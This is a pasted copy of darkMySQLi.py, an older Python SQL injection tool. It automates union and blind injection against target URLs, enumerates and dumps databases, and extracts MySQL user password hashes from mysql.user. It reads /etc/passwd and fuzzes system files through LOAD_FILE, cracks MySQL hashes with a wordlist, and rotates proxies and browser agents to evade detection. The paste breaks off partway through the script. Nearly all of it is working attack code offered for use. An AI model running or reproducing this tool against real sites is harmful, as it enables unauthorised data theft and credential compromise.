Googleinurl

[SCRIPT]=> darkMySQLi.py Multi Purpose MySQL Injection Tool

Aug 13th, 2014
1,436
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #     1/30/09
  3. ################################################################
  4. #       .___             __          _______       .___        #
  5. #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
  6. #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
  7. #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
  8. #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
  9. #        \/                  \/             \/                 #
  10. #                   ___________   ______  _  __                #
  11. #                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
  12. #                 \  \___|  | \/\  ___/\     /                 #
  13. #                  \___  >__|    \___  >\/\_/                  #
  14. #      est.2007        \/            \/   forum.darkc0de.com   #
  15. ################################################################
  16. # Multi-Purpose MySQL Injection Tool
  17. # FUNCTIONS
  18. #  *union injection
  19. #  *blind injection
  20. #  *post and get method injection ** POST not working yet
  21. #  *full information_schema enumeration
  22. #  *table and column fuzzer
  23. #  *database information extractor
  24. #  *column length finder
  25. #  *load_file fuzzer
  26. #  *general info gathering
  27. #  *MySQL hash cracker
  28. # FEATURES
  29. #  *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
  30. #  *Proxy Auth (works great with Squid w/ basic auth)
  31. #  *Random browser agent chosen everytime the script runs
  32. #  *debug mode for seeing every URL request, proxy used, browser agent used
  33.  
  34. # Share the c0de! (f*ck Windows! Get a real OS!)
  35.  
  36. # darkc0de Crew
  37. # www.darkc0de.com
  38. # rsauron[at]gmail[dot]com
  39.  
  40. # Greetz to
  41. # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen
  42. # and the darkc0de crew
  43.  
  44. # This was written for educational purpose only. Use it at your own risk.
  45. # Author will be not responsible for any damage!
  46. # Intended for authorized Web Application Pen Testing!
  47.  
  48. # CHANGES
  49. # 1.6 ADDED --end evasion setting
  50. # 1.5 Fixed --strart now starts at correct number instead of +1
  51. # 1.4 Fixed schema mode when a table was specified - app would hand after last column
  52. # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping)
  53. # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string
  54.  
  55. # BE WARNED, THIS TOOL IS VERY LOUD..
  56.  
  57. import urllib, sys, re, os, socket, httplib, urllib2, time, random
  58.  
  59. ##Set default evasion options here
  60. arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point
  61. arg_eva = "+" # examples "/**/" ,"+", "%20"
  62. ## colMax variable for column Finder
  63. colMax = 200
  64. ## Set the default timeout value for requests
  65. socket.setdefaulttimeout(10)
  66. ## Default Log File Name
  67. logfile = "darkMySQLi.log"
  68. ## File Location to fuzz with for TABLE fuzzer
  69. tablefuzz = "tablesfuzz.txt"
  70. ## File Location to fuzz with for COLUMN fuzzer
  71. columnfuzz = "columnsfuzz.txt"
  72. ## File Location to fuzz with for LOAD_FILE fuzzer
  73. loadfilefuzz = "loadfilefuzz.txt"
  74. ## Agents
  75. agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
  76.         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
  77.     "Microsoft Internet Explorer/4.0b1 (Windows 95)",
  78.     "Opera/8.00 (Windows NT 5.1; U; en)"]
  79.  
  80. #URL Get Function
  81. def GetThatShit(head_URL):
  82.         source = ""
  83.         global gets;global proxy_num
  84.         head_URL = head_URL.replace("+",arg_eva)
  85.         request_web = urllib2.Request(head_URL)
  86.         request_web.add_header('User-Agent',agent)
  87.         while len(source) < 1:
  88.                 if arg_debug == "on":
  89.                         print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
  90.                 try:
  91.                         gets+=1;proxy_num+=1
  92.                         source = proxy_list[proxy_num % proxy_len].open(request_web).read()
  93.                 except (KeyboardInterrupt, SystemExit):
  94.                         raise
  95.                 except (urllib2.HTTPError):
  96.                         print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
  97.                         print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
  98.                         break
  99.                 except:
  100.                         print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
  101.                         print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
  102.                         raise
  103.         return source
  104.  
  105. #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology
  106. def GuessValue(URL):
  107.         lower = lower_bound;upper = upper_bound
  108.         while lower < upper:
  109.                 try:
  110.                         mid = (lower + upper) / 2
  111.                         head_URL = URL + ">"+str(mid)
  112.                         source = GetThatShit(head_URL)
  113.                         match = re.findall(arg_string,source)
  114.                         if len(match) >= 1:
  115.                                 lower = mid + 1
  116.                         else:
  117.                                 upper = mid                    
  118.                 except (KeyboardInterrupt, SystemExit):
  119.                         raise
  120.                 except:
  121.                         pass
  122.  
  123.         if lower > lower_bound and lower < upper_bound:
  124.                 value = lower
  125.         else:
  126.                 head_URL = URL + "="+str(lower)
  127.                 source = GetThatShit(head_URL)
  128.                 match = re.findall(arg_string,source)
  129.                 if len(match) >= 1:
  130.                         value = lower
  131.                 else:
  132.                         value = 63
  133.                         print "Could not find the ascii character! There must be a problem.."
  134.                         print "Check to make sure your using the my script right!"
  135.                         print "READ xprog's blind sql tutorial!\n"
  136.                         sys.exit(1)
  137.         return value
  138.  
  139. ## Functions for MySQL5 hash cracking --- THANKS d3hydr8
  140. def c1(word):
  141.     s = hashlib.sha1()
  142.     s.update(word[:-1])
  143.     s2 = hashlib.sha1()
  144.     s2.update(s.digest())
  145.     return s2.hexdigest()
  146.  
  147. def c2(word):
  148.     s = sha.new()
  149.     s.update(word[:-1])
  150.     s2 = sha.new()
  151.     s2.update(s.digest())
  152.     return s2.hexdigest()
  153.  
  154. ## Funtion for MySQL323 hash cracking
  155. def mysql323(clear):
  156.     # Taken almost verbatim from mysql's source
  157.     nr = 1345345333
  158.     add = 7
  159.     nr2 = 0x12345671
  160.     retval = ""
  161.     for c in clear:
  162.     if c == ' ' or c == '\t':
  163.         continue
  164.     tmp = ord(c)
  165.     nr ^= (((nr & 63) + add) * tmp) + (nr << 8)
  166.     nr2 += (nr2 << 8) ^ nr
  167.     add += tmp
  168.     res1 = nr & ((1 << 31) - 1)
  169.     res2 = nr2 & ((1 << 31) - 1)
  170.     return "%08lx%08lx" % (res1, res2)
  171.    
  172. #say hello
  173. if len(sys.argv) <= 1:
  174.         print "\n|--------------------------------------------------|"
  175.         print "| rsauron@gmail.com                         v1.6   |"
  176.         print "|   1/2009      darkMySQLi.py                      |"
  177.         print "|     -- Multi Purpose MySQL Injection Tool --     |"
  178.         print "| Usage: darkMySQLi.py [options]                   |"
  179.         print "|                      -h help       darkc0de.com  |"
  180.         print "|--------------------------------------------------|\n"
  181.         sys.exit(1)
  182.  
  183. #help option
  184. for arg in sys.argv:
  185.         if arg == "-h" or arg == "--help":
  186.                 print "\n       darkMySQLi v1.6                         rsauron@gmail.com"
  187.                 print "                                              forum.darkc0de.com"
  188.                 print "Usage: ./darkMySQLi.py [options]"
  189.                 print "Options:"
  190.                 print "  -h, --help           shows this help message and exits"
  191.                 print "  -d, --debug          display URL debug information\n"
  192.                 print "  Target:"
  193.                 print "    -u URL, --url=URL  Target url\n"
  194.                 print "  Methodology:"
  195.                 print "    -b, --blind        Use blind methodology (req: --string)"
  196.                 print "    -s, --string       String to match in page when the query is valid"
  197.                 print "  Method:"
  198.                 print "    --method=PUT       Select to use PUT method ** NOT WORKING"
  199.                 print "  Modes:"
  200.                 print "    --dbs              Enumerate databases           MySQL v5+"
  201.                 print "    --schema           Enumerate Information_schema (req: -D,"
  202.                 print "                       opt: -T)                      MySQL v5+"
  203.                 print "    --full             Enumerate all we can          MySQL v5+"
  204.                 print "    --info             MySQL Server configuration    MySQL v4+"
  205.                 print "    --fuzz             Fuzz Tables & Columns Names   MySQL v4+"
  206.                 print "    --findcol          Find Column length            MySQL v4+"
  207.                 print "    --dump             Dump database table entries  (req: -T,"
  208.                 print "                       opt: -D, -C, --start)         MySQL v4+"
  209.                 print "    --crack=HASH       Crack MySQL Hashs (req: --wordlist)"
  210.                 print "    --wordlist=LIS.TXT Wordlist to be used for cracking"
  211.                 print "  Define:"
  212.                 print "    -D DB              database to enumerate"
  213.                 print "    -T TBL             database table to enumerate"
  214.                 print "    -C COL             database table column to enumerate"
  215.                 print "  Optional:"
  216.                 print "    --ssl              To use SSL"
  217.                 print "    --end              To use   +  and -- for the URLS --end \"--\" (Default)"
  218.                 print "                       To use /**/ and /* for the URLS --end \"/*\""
  219.                 print "    --rowdisp          Do not display row # when dumping"
  220.                 print "    --start=ROW        Row number to begin dumping at"
  221.                 print "    --where=COL,VALUE  Use a where clause in your dump"
  222.                 print "    --orderby=COL      Use a orderby clause in your dump"
  223.                 print "    --cookie=FILE.TXT  Use a Mozilla cookie file"
  224.                 print "    --proxy=PROXY      Use a HTTP proxy to connect to the target url"
  225.                 print "    --output=FILE.TXT  Output results of tool to this file\n"
  226.                 sys.exit(1)
  227.  
  228. #define variables
  229. site = ""
  230. proxy = "None"
  231. arg_string = ""
  232. arg_blind = "--union"
  233. arg_table = "None"
  234. arg_database = "None"
  235. arg_columns = "None"
  236. arg_row = "Rows"
  237. arg_cookie = "None"
  238. arg_insert = "None"
  239. arg_where = ""
  240. arg_orderby = ""
  241. arg_debug = "off"
  242. arg_rowdisp = 1
  243. arg_adminusers = 10
  244. arg_wordlist = ""
  245. arg_ssl = "off"
  246. arg_proxy_auth = ""
  247. darkc0de = "concat(0x1e,0x1e,"
  248. mode = "None"
  249. lower_bound = 0
  250. upper_bound = 16069
  251. line_URL = ""
  252. count_URL = ""
  253. cur_db = ""
  254. cur_table = ""
  255. terminal = ""
  256. count = 0
  257. gets = 0
  258. table_num = 0
  259. num = 0
  260. ser_ver = 3
  261. version =[]
  262. let_pos = 1
  263. lim_num = 0
  264. agent = ""
  265.  
  266. #Check args
  267. for arg in sys.argv:
  268.     if arg == "-u" or arg == "--url":
  269.         site = sys.argv[count+1]
  270.     elif arg == "--output":
  271.         logfile = sys.argv[count+1]
  272.     elif arg == "--proxy":
  273.         proxy = sys.argv[count+1]
  274.         elif arg == "--proxyauth":
  275.                 arg_proxy_auth = sys.argv[count+1]
  276.     elif arg == "--dump":
  277.                 mode = arg;arg_dump = sys.argv[count]
  278.         elif arg == "--full":
  279.                 mode = arg
  280.         elif arg == "--schema":
  281.                 mode = arg;arg_schema = sys.argv[count]
  282.         elif arg == "--dbs":
  283.                 mode = arg;arg_dbs = sys.argv[count]
  284.         elif arg == "--fuzz":
  285.                 mode = arg;arg_fuzz = sys.argv[count]
  286.         elif arg == "--info":
  287.                 mode = arg;arg_info = sys.argv[count]
  288.         elif arg == "--crack":
  289.                 mode = arg;arg_hash = sys.argv[count+1]
  290.         elif arg == "--wordlist":
  291.                 arg_wordlist = sys.argv[count+1]
  292.         elif arg == "--findcol":
  293.                 mode = arg;arg_findcol = sys.argv[count]
  294.         elif arg == "--cookie":
  295.                 arg_cookie = sys.argv[count+1]
  296.         elif arg == "--ssl":
  297.                 arg_ssl = "on"
  298.         elif arg == "-b" or arg == "--blind":
  299.                 arg_blind = arg;arg_blind = sys.argv[count]
  300.     elif arg == "-s" or arg == "--string":
  301.                 arg_string = sys.argv[count+1]
  302.     elif arg == "-D":
  303.         arg_database = sys.argv[count+1]
  304.     elif arg == "-T":
  305.         arg_table = sys.argv[count+1]
  306.     elif arg == "-C":
  307.         arg_columns = sys.argv[count+1]
  308.     elif arg == "--start":
  309.                 num = int(sys.argv[count+1]) - 1
  310.                 table_num = num
  311.         elif arg == "-d" or arg == "--debug":
  312.                 arg_debug = "on"
  313.         elif arg == "--where":
  314.                 arg_where = sys.argv[count+1]
  315.         elif arg == "--orderby":
  316.                 arg_orderby = sys.argv[count+1]
  317.         elif arg == "--rowdisp":
  318.                 arg_rowdisp = sys.argv[count]
  319.                 arg_rowdisp = 0
  320.     elif arg == "--end":
  321.                 arg_end = sys.argv[count+1]
  322.                 if arg_end == "--":
  323.                         arg_eva = "+"
  324.                 else:
  325.                         arg_eva = "/**/"
  326.     count+=1
  327.  
  328. #Title write
  329. file = open(logfile, "a")
  330. print "\n|--------------------------------------------------|"
  331. print "| rsauron@gmail.com                         v1.6   |"
  332. print "|   1/2009      darkMySQLi.py                      |"
  333. print "|     -- Multi Purpose MySQL Injection Tool --     |"
  334. print "| Usage: darkMySQLi.py [options]                   |"
  335. print "|                      -h help       darkc0de.com  |"
  336. print "|--------------------------------------------------|\n"
  337.  
  338. #Arg Error Checking
  339. if mode != "--crack" and site == "":
  340.         print "[-] URL is required!\n[-] Need Help? --help\n"
  341.         sys.exit(1)
  342. if mode == "None":
  343.         print "[-] Mode is required!\n[-] Need Help? --help\n"
  344.         sys.exit(1)
  345. if mode == "--schema" and arg_database == "None":
  346.         print "[-] Must include -D flag!\n[-] Need Help? --help\n"
  347.         sys.exit(1)
  348. if mode == "--dump":
  349.         if arg_table == "None" or arg_columns == "None":
  350.                 print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
  351.                 sys.exit(1)
  352. if proxy != "None":
  353.         if len(proxy.split(".")) == 2:
  354.                 proxy = open(proxy, "r").read()
  355.         if proxy.endswith("\n"):
  356.                 proxy = proxy.rstrip("\n")
  357.         proxy = proxy.split("\n")
  358. if arg_ssl == "off":
  359.         if site[:4] != "http":
  360.                 site = "http://"+site
  361. else:
  362.         if site[:5] != "https":
  363.                 site = "https://"+site
  364. if site.endswith("/*"):
  365.     site = site.rstrip('/*')
  366. if site.endswith("--"):
  367.     site = site.rstrip('--')
  368. if arg_cookie != "None":
  369.         try:
  370.                 cj = cookielib.MozillaCookieJar()
  371.                 cj.load(arg_cookie)
  372.                 cookie_handler = urllib2.HTTPCookieProcessor(cj)
  373.         except:
  374.                 print "[!] There was a problem loading your cookie file!"
  375.                 print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
  376.                 print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
  377.                 sys.exit(1)
  378. else:
  379.         cookie_handler = urllib2.HTTPCookieProcessor()
  380. if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1:
  381.     print "[-] Site must contain \'darkc0de\'\n"
  382.     sys.exit(1)
  383. if arg_blind == "--blind" and arg_string == "":
  384.         print "[-] You must specify a --string when using blind methodology.\n"
  385.         sys.exit(1)
  386. if arg_columns != "None":
  387.         arg_columns = arg_columns.split(",")
  388. if arg_insert != "None":
  389.         arg_insert = arg_insert.split(",")
  390. if mode == "--crack" and arg_wordlist == "":
  391.         print "[-] You must specify a --wordlist to crack with.\n"
  392.         sys.exit(1)
  393. agent = random.choice(agents)
  394.  
  395. file.write("\n|--------------------------------------------------|")
  396. file.write("\n| rsauron@gmail.com                         v1.6   |")
  397. file.write("\n|   1/2009      darkMySQLi.py                      |")
  398. file.write("\n|     -- Multi Purpose MySQL Injection Tool --     |")
  399. file.write("\n| Usage: darkMySQLi.py [options]                   |")
  400. file.write("\n|                      -h help       darkc0de.com  |")
  401. file.write("\n|--------------------------------------------------|")
  402.        
  403. ## MySQL Hash cracking
  404. if mode == "--crack":
  405.         try:
  406.                 arg_wordlist = open(arg_wordlist, "r")
  407.         except(IOError):
  408.                 print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
  409.                 sys.exit(1)
  410.         if len(arg_hash) != 40 and len(arg_hash) != 16:
  411.                 print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
  412.                 sys.exit(1)
  413.         arg_wordlist = arg_wordlist.readlines()
  414.         print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
  415.         if len(arg_hash) == 40:
  416.                 print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
  417.                 try:
  418.                         import hashlib
  419.                         for word in arg_wordlist:
  420.                                 if arg_hash == c1(word):
  421.                                         print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
  422.                                         break
  423.                 except(ImportError):
  424.                         import sha
  425.                         for word in arg_wordlist:
  426.                                 if arg_hash == c2(word):
  427.                                         print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
  428.                                         break
  429.         else:
  430.                 print "[+] Detected MySQL v4 Hash:",arg_hash
  431.                 print "[+] Try darkc0de hash database @ "
  432.                 for word in arg_wordlist:
  433.                         word = word.rstrip("\n")
  434.                         if arg_hash == mysql323(word):
  435.                                 print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
  436.                                 break
  437.         print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
  438.         sys.exit(1)
  439.        
  440. #General Info
  441. print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
  442. print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
  443. print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
  444. print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
  445. if site[:5] == "https":
  446.         print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
  447. else:
  448.         print "[+] SSL: No";file.write("\n[+] SSL: No")
  449. print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)
  450.        
  451. #Build proxy list
  452. proxy_list = [];proxy_list_count = []
  453. if proxy != "None":
  454.     print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
  455.     for p in proxy:
  456.         try:
  457.                         match = re.findall(":",p)
  458.                         if len(match) == 3:
  459.                                 arg_proxy_auth = []
  460.                                 prox = p.split(":")
  461.                                 arg_proxy_auth += prox
  462.                         if arg_proxy_auth != "":
  463.                                 proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
  464.                                 proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
  465.                                 opener = urllib2.build_opener(proxy_auth_handler)
  466.                                 opener.open("http://www.google.com")
  467.                                 proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
  468.                                 proxy_list_count.append(p);arg_proxy_auth = ""
  469.                         else:
  470.                                 proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
  471.                                 opener = urllib2.build_opener(proxy_handler)
  472.                                 opener.open("http://www.google.com")
  473.                                 proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
  474.                                 proxy_list_count.append(p)
  475.                         if len(match) == 3 or len(match) == 1:
  476.                                 print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
  477.                         else:
  478.                                 print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
  479.         except:
  480.             print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
  481.             pass
  482.     if len(proxy_list) == 0:
  483.         print "[-] All proxies have failed. App Exiting"
  484.         sys.exit(1)
  485.     print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
  486. else:
  487.     print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
  488.     proxy_list.append(urllib2.build_opener(cookie_handler))
  489.         proxy_list_count.append("None")
  490. proxy_num = 0
  491. proxy_len = len(proxy_list)
  492.  
  493. ## Blind String checking!
  494. if arg_blind == "--blind":
  495.         print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
  496.         head_URL = site+"+AND+1=1"
  497.         source = GetThatShit(head_URL)
  498.         match = re.findall(arg_string,source)
  499.         if len(match) >= 2:
  500.                 print "\n[-] The String you used has been found on the target page in-use more than 2 times"
  501.                 print "[-] This might lead to false positives with the blind methodology"
  502.                 print "[-] Might not mean anything.. I am just trying to help out.."
  503.                 print "[-] If you have problems you might know why.. ;-)\n"
  504.         if len(match) == 0:
  505.                 print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
  506.                 sys.exit(1)
  507.         if len(match) == 1:
  508.                 print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")
  509.                
  510. #Column Finder c0de
  511. if mode == "--findcol":
  512.         print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
  513.         print "[+] Testing: ",
  514.         file.write("\n[+] Testing: ",)
  515.         checkfor=[];nullFound=[];nullnum=[];makepretty = ""
  516.         sitenew = site+"+AND+1=2+UNION+SELECT+"
  517.         for x in xrange(1,colMax):
  518.                 try:
  519.                         sys.stdout.write("%s," % (x))
  520.                         file.write(str(x)+",")
  521.                         sys.stdout.flush()
  522.                         darkc0de = "dark"+str(x)+"code"
  523.                         checkfor.append(darkc0de)  
  524.                         if x > 1:
  525.                                 sitenew += ","
  526.                         sitenew += "0x"+darkc0de.encode("hex") 
  527.                         finalurl = sitenew+arg_end
  528.                         source = GetThatShit(finalurl)
  529.                         for y in checkfor:
  530.                                 colFound = re.findall(y,source)
  531.                                 if len(colFound) != 0:
  532.                                         nullFound.append(colFound[0])
  533.                         if len(nullFound) >= 1:
  534.                                 print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
  535.                                 print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
  536.                                 for z in nullFound:
  537.                                         nullcol = re.findall(("\d+"),z)
  538.                                         nullnum.append(nullcol[0])
  539.                                         sys.stdout.write("%s," % (nullcol[0]))
  540.                                         file.write(str(nullcol[0])+",")
  541.                                         sys.stdout.flush()
  542.                                 for z in xrange(0,len(checkfor)):
  543.                                         z+=1
  544.                                         if z > 1:
  545.                                                 makepretty += ","
  546.                                         makepretty += str(z)
  547.                                 site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
  548.                                 print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
  549.                                 for z in nullnum:
  550.                                         site = site.replace("+"+z+",","+darkc0de,")
  551.                                         site = site.replace(","+z+",",",darkc0de,")
  552.                                         site = site.replace(","+z+arg_end,",darkc0de"+arg_end)
  553.                                 print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site)
  554.                                 print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
  555.                                 print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
  556.                                 print "[-] Done\n";file.write("\n[-] Done\n")
  557.                                 print "Don't forget to check", logfile,"\n"
  558.                                 file.close();sys.exit(1)
  559.                 except (KeyboardInterrupt, SystemExit):
  560.                         raise
  561.                 except:
  562.                         pass
  563.                        
  564.         print "\n[!] Sorry Column Length could not be found."
  565.         file.write("\n[!] Sorry Column Length could not be found.")
  566.         print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
  567.         print "[-] Done\n"
  568.         sys.exit(1)
  569.  
  570. #Retrieve version:user:database
  571. if arg_blind != "--blind":
  572.         head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
  573.         print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
  574.         source = GetThatShit(head_URL)
  575.         match = re.findall("\x1e\x1e\S+",source)
  576.         if len(match) >= 1:
  577.                 match = match[0][0:].split("\x1e")
  578.                 version = match[2]
  579.                 user = match[3]
  580.                 database = match[4]
  581.                 print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
  582.                 print "\tUser:", user;file.write("\tUser: "+user+"\n")
  583.                 print "\tVersion:", version;file.write("\tVersion: "+version)
  584.         else:
  585.                 print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
  586.                 sys.exit(1)
  587. else:
  588.         print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
  589.         while 1:
  590.                 config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
  591.                 source = GetThatShit(config_URL)
  592.                 match = re.findall(arg_string,source)
  593.                 if len(match) >= 1:
  594.                         print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
  595.                         version += str(ser_ver)
  596.                         break
  597.                 if ser_ver == 6:
  598.                         print "[-] Was unable to determine MySQL version.\n[-] Done"
  599.                         sys.exit(1)
  600.                 ser_ver+=1
  601.                
  602. #lets check what we can do based on version
  603. if mode == "--schema" or mode == "--dbs" or mode == "--full":
  604.         if version[0] == str(4):
  605.                 print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
  606.                 print "[-] -h for help"
  607.                 sys.exit(1)
  608.  
  609. # Mode --info
  610. if mode == "--info" and arg_blind != "--blind":
  611.         head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end
  612.         source = GetThatShit(head_URL)
  613.         match = re.findall("darkc0de",source)
  614.         if len(match) >= 1:
  615.                 yesno = "YES <-- w00t w00t"
  616.         else:
  617.                 yesno = "NO"
  618.         print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
  619.         if yesno == "YES <-- w00t w00t":
  620.                 print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
  621.                 head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
  622.                 source = GetThatShit(head_URL)
  623.                 match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
  624.                 print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
  625.                 head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
  626.                 head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
  627.                 for x in range(0,int(userend)):
  628.                         try:
  629.                                 source = GetThatShit(head_URL.replace("NUM",str(x)))
  630.                                 match = re.findall("\x1e\x1e\S+",source)
  631.                                 match = match[0].strip("\x1e").split("\x1e")
  632.                                 if len(match) != 3:
  633.                                         nullvar = "NULL"
  634.                                         match += nullvar
  635.                                 print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
  636.                         except (KeyboardInterrupt, SystemExit):
  637.                                 raise
  638.                         except:
  639.                                 pass
  640.         else:
  641.                 print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
  642.                 file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
  643.         head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
  644.         source = GetThatShit(head_URL)
  645.         match = re.findall("darkc0de",source)
  646.         if len(match) >= 1:
  647.                 yesno = "YES <-- w00t w00t"
  648.         else:
  649.                 yesno = "NO"
  650.         print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
  651.         if yesno == "YES <-- w00t w00t":
  652.                 fuzz_load = open(loadfilefuzz, "r").readlines()
  653.                 head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
  654.                 source = GetThatShit(head_URL)
  655.                 match = re.findall("darkc0de",source)
  656.                 if len(match) > 1:
  657.                         onoff = "OFF <-- w00t w00t"
  658.                 else:
  659.                         onoff = "ON"       
  660.                 print "\n[+] Magic quotes are:",onoff
  661.                 yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
  662.                 if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
  663.                         print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
  664.                         print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
  665.                         for sysfile in fuzz_load:
  666.                                 sysfile = sysfile.rstrip("\n")
  667.                                 if proxy != "None":
  668.                                         sysfile = sysfile.replace("/","%2F")
  669.                                         sysfile = sysfile.replace(".","%2E")
  670.                                 if onoff == "OFF <-- w00t w00t":
  671.                                         head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
  672.                                 else:
  673.                                         head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
  674.                                 source = GetThatShit(head_URL)
  675.                                 match = re.findall("darkc0de",source)
  676.                                 if len(match) > 0:
  677.                                     print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
  678.                                     head_URL = head_URL.replace("concat(","")
